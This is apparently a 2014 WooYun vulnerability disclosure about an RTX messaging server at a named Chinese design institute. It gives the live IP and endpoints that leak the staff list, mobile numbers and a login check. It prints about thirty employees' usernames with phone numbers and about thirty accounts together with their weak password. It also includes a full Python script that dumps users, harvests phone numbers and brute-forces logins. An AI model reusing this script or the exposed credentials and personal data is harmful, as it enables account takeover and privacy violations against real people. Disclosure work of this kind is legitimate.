当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-048585

漏洞标题:rtx服务器结合弱口令泄漏员工帐号密码

相关厂商:中国建筑设计研究院(集团)

漏洞作者: l137

提交时间:2014-01-11 19:14

修复时间:2014-02-25 19:14

公开时间:2014-02-25 19:14

漏洞类型:用户资料大量泄漏

危害等级:中

自评Rank:5

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-01-11: 细节已通知厂商并且等待厂商处理中
2014-01-16: 厂商已经确认,细节仅向厂商公开
2014-01-26: 细节向核心白帽子及相关领域专家公开
2014-02-05: 细节向普通白帽子公开
2014-02-15: 细节向实习白帽子公开
2014-02-25: 细节向公众公开

简要描述:

rtx server 存在暴露用户信息的漏洞,通过web访问

详细说明:

http://123.127.50.2:8012/userlist.php #泄漏公司所有rtx用户
http://123.127.50.2:8012/getmobile.cgi?receiver= #泄漏用户手机号
http://123.127.50.2:8012/check.php #验证弱口令


2250    zhangs  13683322935
2251 caob 13501098519
2252 luowb 13522144977
2253 lux 13522972058
2254 guihs 18611711855
2256 chengy 13401018026
2257 liuwei 13002155094
2258 lvjg 18611834789
2259 yaojr 13718722130
2260 sunqian 13260483072
2262 zhangjy 15010082958
2263 zhangp 13910709381
2264 xusong 13240188638
2266 liangt 13901385904
2267 jiangsh 13466319132
2269 wangyn 13910397679
2270 xianjh 13671182230
2271 zhaox 15910832790
2272 shaozh 13520275077
2274 weisw 13120452627
2275 louln 13661310480
2276 sunqx 13910323073
2277 zhangyan 13718430085
2278 zhangsuy 13611011805
2281 jinll 13011099030
2282 wancx 13501107909
2283 liudw 13910769115
2284 liuzw 15811128783
2285 wanghui 13466711828
...... 共940+条记录


弱口令可登录
Brute force starting....
Please input the number of threads for brute force(default 10) :
And it will take a little time ...
username password
zhangm 12345678
songdj 12345678
haoxq 12345678
yuy 12345678
jianghb 12345678
tongl 12345678
yinzy 12345678
sunyb 12345678
wangmz 12345678
wancx 12345678
liudw 12345678
yulei 12345678
wanghui 12345678
xuelei 12345678
xuyc 12345678
liuf 12345678
chenye 12345678
mahong 12345678
liuzx 12345678
liuyy 12345678
changh 12345678
zhuanggw 12345678
zhangj02 12345678
zhangd 12345678
wangk 12345678
sungr 12345678
chengxf 12345678
guyu 12345678
hexw 12345678
wangqi 12345678


rtx check脚本

#!/usr/bin/env python
#-*-coding=utf-8-*-
# date : 2013.12.16
# rtx hack
import threading
import urllib
import re
import sys
import getopt
import json
import threading
import httplib
import time
def usage():
print '''
Usage : ./f.py -u target_ip
-h Show this page!
'''
class postThread(threading.Thread):

def __init__(self, data):
threading.Thread.__init__(self)
self.data = data
def run(self):
for x in self.data:
try:
print self.data
except Exception, e:
print e

class rtx(object):
'rtx attacker class'
ip = ''
data = ''
port = '8012'

fullData = ''

def __init__(self, ip):
if self.checkIp(ip):
self.ip = ip
url = "http://"+ip+":"+self.port+"/userlist.php"
try:
content = urllib.urlopen(url).read()
self.data = json.loads(content)
except (IOError,ValueError),e:
print "\033[1;31m"+self.ip+"\33[0m is not vulnerable!"
sys.exit()
self.checkVulnerable()
#print self.data
self.checkPhone()
self.bruteforce()
else:
print " ______________"
print " \033[07m are you kidding me? \033[27m "
print " \ "
print " \ \033[1;31m,__,\033[1;m "
print " \ \033[1;31m(\033[1;moo\033[1;31m)____\033[1;m "
print " \033[1;31m(__) )\ \033[1;m "
print " \033[1;31m ||--|| \033[1;m\033[05m*\033[25m\033[1;m [ l137 | lietdai@gmail.com ]\r\n\r\n"
@staticmethod
def checkIp(ip):
pattern = r"\b(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b"
if re.match(pattern, ip):
return True
else:
return False
def checkVulnerable(self):
print "\033[1;31m Oh...I got something!!"
print " Please wait a bit....."
#for x in range(len(self.data)):
# print self.data[x]
print " "+str(len(self.data))+" records was found!! \033[0m"
def checkPhone(self):
print "\033[1;31m Now check phone number in records.....\033[0m"
url = "http://"+self.ip+":"+self.port+"/getmobile.cgi?receiver="
output = file('out.txt','w')
for x in xrange(0,len(self.data)):
url2 = url + self.data[x]['name']
self.data[x]['phone'] = urllib.urlopen(url2).read()
try:
output.write(str(self.data[x]['id'])+'\t'+self.data[x]['name']+'\t'+self.data[x]['phone']+'\n')
print self.data[x]
except Exception,e:
print e
output.close()
print "\033[1;31m put the records int out.txt\033[0m"
#print self.data
def bruteforce(self):
print "\033[1;31m Brute force starting...."
num = raw_input(" Please input the number of threads for brute force(default 10) : ")
print " And it will take a little time ...\033[0m"
if num == '':
num = 10
else :
try :
num = int(num)
except ValueError,e:
print e
sys.exit()
if (num < 1) or (num > 15):
print "threads must in 1-15"
sys.exit()

threads = [];
block = len(self.data)/num
for i in xrange(0, num):
if i == num-1:
data = self.data[block*i:]
else:
data = self.data[i*block:(i+1)*block]
t = threading.Thread(target=self.fwork, args = (self.port, self.ip, data))
threads.append(t)
for i in threads:
i.start()
@staticmethod
def fwork(port,ip,b):
for x in xrange(0,len(b)):
dicts = ['111111','123456','qweasd','222222','12345678','000000','qusiba','666666']
#dicts.append(b[x]['phone'])
dicts.append(b[x]['name'])
for x in dicts:
httpClient = None
try:
name = dicts[-1]
postData = urllib.urlencode({'user':name,'pwd':x})
headers = {"Content-type":"application/x-www-form-urlencoded", "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"};
httpClient = httplib.HTTPConnection(ip, port, timeout=30)
httpClient.request("POST", "/check.php", postData, headers)
response = httpClient.getresponse()
responseHeader = response.getheaders()
if responseHeader[1][1] == '2573':
print name,x
except Exception, e:
print e
finally:
httpClient.close()
def getWeakPass(self):
file_ob = open("password.txt")
try:
list_file = file_ob.readlines()
finally:
file_ob.close()
for x in list_file:
self.dists.append(x.strip('\n'))
def main():
try:
opts, args = getopt.getopt(sys.argv[1:], "u:h", ["help"])
except getopt.GetoptError:
usage()
sys.exit()
for o,a in opts:
if o in ("-h", "--help"):
usage()
elif o == "-u":
r = rtx(a)
else :
usage()
if len(opts) == 0:
usage()

if __name__ == "__main__" :
main()

漏洞证明:

Screenshot from 2013-12-28 13:05:39.png

修复方案:

版权声明:转载请注明来源 l137@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2014-01-16 09:14

厂商回复:

CNVD确认并复现所述情况,已经由CNVD通过公开联系渠道通报给中国建筑设计研究院处置。

最新状态:

暂无